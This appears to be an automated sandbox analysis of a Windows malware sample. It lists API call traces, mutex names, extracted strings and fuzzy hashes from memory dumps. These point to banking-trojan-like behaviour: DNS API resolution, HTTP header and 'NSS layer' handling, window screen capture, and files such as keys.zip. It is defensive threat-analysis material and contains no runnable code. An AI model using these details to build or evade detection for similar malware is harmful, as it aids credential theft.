                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CE90), ref: 02BD3277
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,02C0CE90,RFK), ref: 02BD3291
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02BD329A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • RFK, xrefs: 02BD327D
                                                                                                                                                                                                            • Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02BD31E0
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                            • String ID: Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}$RFK
                                                                                                                                                                                                            • API String ID: 505831200-3131017963
                                                                                                                                                                                                            • Opcode ID: 6a5800299db8e7e86de262dd60b1f5868b5493e39049c6a0d23fd1a922f922c9
                                                                                                                                                                                                            • Instruction ID: 7b7cde57d9647831640f838d481e6a93ababbdf98e7367950562e66d2c83ad52
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a5800299db8e7e86de262dd60b1f5868b5493e39049c6a0d23fd1a922f922c9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6110430AC67527BF2705B648C0AF8E77D4AF04B55F508688FB95A21C1EBF094058FA7
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BBEB74
                                                                                                                                                                                                            • StrCmpNIA.SHLWAPI(00000002,?,00000000,?,?,00000000,?,?,?,?,?,?,?,02BBF9DF,?,?), ref: 02BBEBD5
                                                                                                                                                                                                            • StrCmpNIA.SHLWAPI(00000001,?,00000000,?,?,00000000,?,?,?,?,?,?,?,02BBF9DF,?,?), ref: 02BBEC91
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BBEDD3
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BBEE8E
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BBEE9F
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BBEED1
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memcpy$memset
                                                                                                                                                                                                            • String ID: Content-Length$Content-Type$Host$NSS layer$Referer$http://$https://
                                                                                                                                                                                                            • API String ID: 438689982-3158524741
                                                                                                                                                                                                            • Opcode ID: 1109bc98646473fc0236e641b42992170e3899a8b62bc37ce8f8c6330c5cbada
                                                                                                                                                                                                            • Instruction ID: 4510274edb432ebf6a99fc4607050113ddef9785de68b889f654054b6fdf902a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1109bc98646473fc0236e641b42992170e3899a8b62bc37ce8f8c6330c5cbada
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E2D1F532A042155FEF338E68C8847FEB7A6EF45314F9845D9E906AB261D7F0D842CB91
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00008001,?), ref: 02BBA70E
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02BB9523,00008001,?), ref: 02BBA737
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02BBA73E
                                                                                                                                                                                                            • PostMessageA.USER32(?,00000215,00000000,00000000), ref: 02BBA752
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00008001,?), ref: 02BBA7C1
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02BB9523,00008001,?), ref: 02BBA7DA
                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 02BBA86B
                                                                                                                                                                                                            • GetParent.USER32(00000000), ref: 02BBA882
                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 02BBA8C9
                                                                                                                                                                                                            • GetWindowInfo.USER32 ref: 02BBA941
                                                                                                                                                                                                              • Part of subcall function 02BB9FD0: GetWindowRect.USER32(?,?), ref: 02BB9FF7
                                                                                                                                                                                                              • Part of subcall function 02BB9FD0: IsRectEmpty.USER32(?), ref: 02BBA066
                                                                                                                                                                                                              • Part of subcall function 02BB9FD0: GetWindowLongA.USER32(?,000000F0), ref: 02BBA076
                                                                                                                                                                                                              • Part of subcall function 02BB9FD0: GetParent.USER32(?), ref: 02BBA08A
                                                                                                                                                                                                              • Part of subcall function 02BB9FD0: MapWindowPoints.USER32(00000000,00000000,?,02BBA6F4), ref: 02BBA093
                                                                                                                                                                                                              • Part of subcall function 02BB9FD0: SetWindowPos.USER32(?,00000000,?,02BBA6F4,00000000,00008001,0000630C,?,02BBA6F4,00000000,00008001,?), ref: 02BBA0B5
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$LongMutexObjectParentRectReleaseSingleWait$EmptyInfoMessagePointsPostProcessThread
                                                                                                                                                                                                            • String ID: <
                                                                                                                                                                                                            • API String ID: 4123185898-4251816714
                                                                                                                                                                                                            • Opcode ID: 212dcce15200272ad6fa827ba5c352b0a8b6823300231638c6a816f1da36f2aa
                                                                                                                                                                                                            • Instruction ID: a4baf29ea786ee0501df891962b240996f20a37a169ffe5f3623952db2409825
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 212dcce15200272ad6fa827ba5c352b0a8b6823300231638c6a816f1da36f2aa
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6191F630A44341ABD7269F28CC88BFA3BE4EF45754F4489A8FA665B2D1C7F4D441CBA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WSAGetLastError.WS2_32 ref: 02BC92D9
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC930C
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC9338
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC935F
                                                                                                                                                                                                            • IsBadReadPtr.KERNEL32(?,?), ref: 02BC9392
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 02BC93AC
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BC93B3
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC93C3
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BC93CE
                                                                                                                                                                                                            • WSASetLastError.WS2_32(?), ref: 02BC9414
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: QueryVirtual$ErrorHeapLast$AllocProcessReadmemcpymemset
                                                                                                                                                                                                            • String ID: GET $POST
                                                                                                                                                                                                            • API String ID: 1455188016-2494278042
                                                                                                                                                                                                            • Opcode ID: 4180839888e5c7e628669367a4b1662d10ddda73806f3ac433c5812db92829e3
                                                                                                                                                                                                            • Instruction ID: 22b8a80819cfffc0950c52264a6ad5fb85c2a779152fd9903f27daa9a5c84b96
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4180839888e5c7e628669367a4b1662d10ddda73806f3ac433c5812db92829e3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C4120B1D00608EFEB60DFA8D884AEEBBF9EF48704F54456DE515E7200E774A9018FA5
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,?,?,02BC06DD,00000001), ref: 02BC040B
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?,?), ref: 02BC040E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?), ref: 02BC041B
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?,?), ref: 02BC041E
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(?,00000000,00000001,00000000,?,?,02BC06DD,00000001), ref: 02BC0437
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?,?), ref: 02BC0448
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,?,?,02BC06DD,00000001), ref: 02BC0458
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?,?), ref: 02BC045B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?), ref: 02BC0468
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?,?), ref: 02BC046B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,?,?,02BC06DD,00000001), ref: 02BC047B
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?,?), ref: 02BC047E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?), ref: 02BC048B
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?,?), ref: 02BC048E
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$FreeValidate$Handle$CloseInformation
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2935687291-0
                                                                                                                                                                                                            • Opcode ID: df177777565f008dda8c2ee194ec54370fadec8a300d8e3746864d3f2877ec0d
                                                                                                                                                                                                            • Instruction ID: ac2abdc16ec9d72f14a1b18ff4602d8132a5457ca651a31ad5e9b3a93c68ef5d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: df177777565f008dda8c2ee194ec54370fadec8a300d8e3746864d3f2877ec0d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68319671A41220DBDB60AF75E888F5B7FBCEF44755F688859EE08D7680D770C450CAA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 02BD19CC
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BD19D9
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD19ED
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD19FF
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD17D0,00000000,00000000,00000000), ref: 02BD1A10
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BD1A1F
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD1A26
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CB84), ref: 02BD1A2D
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,02C0CB84,KBP), ref: 02BD1A47
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02BD1A50
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}, xrefs: 02BD19C0
                                                                                                                                                                                                            • KBP, xrefs: 02BD1A33
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$CloseMutexSleep$BackslashCreateInformationObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                            • String ID: KBP$Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
                                                                                                                                                                                                            • API String ID: 4173420962-1701721152
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BB6350
                                                                                                                                                                                                            • DnsFlushResolverCache.DNSAPI ref: 02BB635A
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(Dnsapi.dll,00000000,00000000,75777390), ref: 02BB636A
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 02BB6383
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DnsQuery_UTF8), ref: 02BB639F
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DnsQuery_W), ref: 02BB63BB
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Query_Main), ref: 02BB63D7
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc$AdminCacheFlushLibraryLoadResolverUser
                                                                                                                                                                                                            • String ID: DnsQuery_A$DnsQuery_UTF8$DnsQuery_W$Dnsapi.dll$Query_Main
                                                                                                                                                                                                            • API String ID: 2466897691-3547598143
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,?,02BBFB54,?), ref: 02BBF88F
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,02BBFB54,?), ref: 02BBF892
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,02BBFB54,?), ref: 02BBF89B
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,02BBFB54,?), ref: 02BBF89E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000,?,02BBFB54,?), ref: 02BBF8B1
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,02BBFB54,?), ref: 02BBF8B4
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,02BBFB54,?), ref: 02BBF8BD
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,02BBFB54,?), ref: 02BBF8C0
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,?,02BBFB54,?), ref: 02BBF8D3
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,02BBFB54,?), ref: 02BBF8D6
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,02BBFB54,?), ref: 02BBF8DF
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,02BBFB54,?), ref: 02BBF8E2
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000,?,02BBFB54,?), ref: 02BBF8F5
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,02BBFB54,?), ref: 02BBF8F8
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,02BBFB54,?), ref: 02BBF901
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,02BBFB54,?), ref: 02BBF904
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1670920773-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsWindow.USER32(00000000), ref: 02BBC96D
                                                                                                                                                                                                            • IsWindowVisible.USER32(00000000), ref: 02BBC97C
                                                                                                                                                                                                              • Part of subcall function 02BBDCE0: GetClassNameA.USER32(?,?,00000101), ref: 02BBDCF6
                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 02BBC9B9
                                                                                                                                                                                                            • GetClassLongA.USER32(00000000,000000E6), ref: 02BBC9C2
                                                                                                                                                                                                            • PrintWindow.USER32(00000000,?,00000000), ref: 02BBC9D5
                                                                                                                                                                                                            • RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,?), ref: 02BBC9FB
                                                                                                                                                                                                            • CreateRectRgn.GDI32(?,?,?,?), ref: 02BBCA11
                                                                                                                                                                                                            • GetWindowRgn.USER32(00000000,00000000), ref: 02BBCA1B
                                                                                                                                                                                                            • OffsetRgn.GDI32(00000000,?,?), ref: 02BBCA35
                                                                                                                                                                                                            • SelectClipRgn.GDI32(?,00000000), ref: 02BBCA40
                                                                                                                                                                                                            • BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00CC0020), ref: 02BBCA69
                                                                                                                                                                                                            • SelectClipRgn.GDI32(?,00000000), ref: 02BBCA72
                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 02BBCA75
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$ClassClipRectSelect$CreateDeleteLongNameObjectOffsetPrintRedrawVisible
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3597830993-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(000004E3,00000000,?,?,?,?), ref: 02BDE265
                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 02BDE281
                                                                                                                                                                                                            • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 02BDE29B
                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 02BDE2B1
                                                                                                                                                                                                            • wsprintfA.USER32 ref: 02BDE2DC
                                                                                                                                                                                                            • realloc.MSVCRT ref: 02BDE302
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 02BDE375
                                                                                                                                                                                                            • free.MSVCRT(00000000,?,00000004,?,00000000,00000000), ref: 02BDE40A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • %02d/%02d/%04d %02d:%02d, xrefs: 02BDE2D6
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$HandleTime$ByteCharCloseCreateInformationMultiSystemWidefreereallocwsprintf
                                                                                                                                                                                                            • String ID: %02d/%02d/%04d %02d:%02d
                                                                                                                                                                                                            • API String ID: 3846129198-4051342895
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0D19C,?,00000000), ref: 02BD41D7
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BD4237
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0D19C), ref: 02BD4297
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: BackslashPath$_snprintf
                                                                                                                                                                                                            • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$keys.zip$path%i.txt$path.txt
                                                                                                                                                                                                            • API String ID: 761212885-4167808235
                                                                                                                                                                                                            • Opcode ID: 25089cdbb0249060e9f3f5a1584c917bbfa035b686dd42d2ae6dd43619e3dfd3
                                                                                                                                                                                                            • Instruction ID: a4fd0f858a9b8fb7590d9d2e8e4530977a2abbe9d526a93523c36a7d6bc29179
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25089cdbb0249060e9f3f5a1584c917bbfa035b686dd42d2ae6dd43619e3dfd3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3951313194464A4FCB1ACB7C98657FA7BF6EF4A300F1485E4D9CAD7240EB719948C780
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 00401150: CreateFileA.KERNEL32(G,@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401177
                                                                                                                                                                                                              • Part of subcall function 00401150: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401193
                                                                                                                                                                                                              • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011B3
                                                                                                                                                                                                              • Part of subcall function 00401150: HeapAlloc.KERNEL32(00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011BA
                                                                                                                                                                                                              • Part of subcall function 00401150: memset.MSVCRT ref: 004011CD
                                                                                                                                                                                                              • Part of subcall function 00401150: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00401B44), ref: 004011EA
                                                                                                                                                                                                              • Part of subcall function 00401150: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401B44), ref: 004011FA
                                                                                                                                                                                                              • Part of subcall function 00401150: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,00401B44), ref: 00401209
                                                                                                                                                                                                              • Part of subcall function 00401150: UnlockFile.KERNEL32(00000000,00401B44,00000000,?,00000000,?,?,?,00401B44), ref: 0040121C
                                                                                                                                                                                                              • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401231
                                                                                                                                                                                                              • Part of subcall function 00401150: HeapValidate.KERNEL32(00000000), ref: 00401234
                                                                                                                                                                                                              • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401241
                                                                                                                                                                                                              • Part of subcall function 00401150: HeapFree.KERNEL32(00000000), ref: 00401244
                                                                                                                                                                                                            • RtlImageNtHeader.NTDLL(00000000), ref: 00401B4F
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00401B63
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00401B74
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401B84
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401BBE
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 00401BC1
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401BCE
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401BD1
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$File$Process$FreeValidate$AddressAllocCountCreateHandleHeaderImageLockModulePointerProcReadSizeTickUnlockmemset
                                                                                                                                                                                                            • String ID: G,@$RtlUniform$ntdll.dll
                                                                                                                                                                                                            • API String ID: 1392322707-905597979
                                                                                                                                                                                                            • Opcode ID: 2010ef54e731929bdeef478eef36219a5a0ac2089432c3df2103351bfe7421e8
                                                                                                                                                                                                            • Instruction ID: 64d0ad1f4564684b16137518c26293c6cc216b866d3c13d6df455aa1ddd35d97
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2010ef54e731929bdeef478eef36219a5a0ac2089432c3df2103351bfe7421e8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 00118271600304ABD724ABB69D49F9B7BA89F85755F044136FB09F62E1EB38DD00CA68
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 02BD19CC
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BD19D9
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD19ED
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD19FF
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD17D0,00000000,00000000,00000000), ref: 02BD1A10
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BD1A1F
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD1A26
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CB84), ref: 02BD1A2D
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,02C0CB84,KBP), ref: 02BD1A47
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02BD1A50
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}, xrefs: 02BD19C0
                                                                                                                                                                                                            • KBP, xrefs: 02BD1A33
                                                                                                                                                                                                            Memory Dump Source
